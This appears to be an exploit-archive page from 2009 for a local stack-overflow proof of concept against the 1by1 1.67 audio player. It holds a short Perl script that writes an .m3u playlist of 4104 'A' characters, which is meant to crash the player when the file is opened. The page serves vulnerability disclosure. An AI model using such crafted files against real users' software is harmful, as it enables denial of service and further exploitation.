[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 1by1 1.67 (.m3u File) Local Stack Overflow PoC
# Published : 2009-04-20
# Author : GoLd_M
# Previous Title : MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)
# Next Title : CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
# # 1by1 1.67 (.M3U File) Local Stack Overflow POC # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created n";
print "Thanx Tryag.Com";
# www.Syue.com [2009-04-20]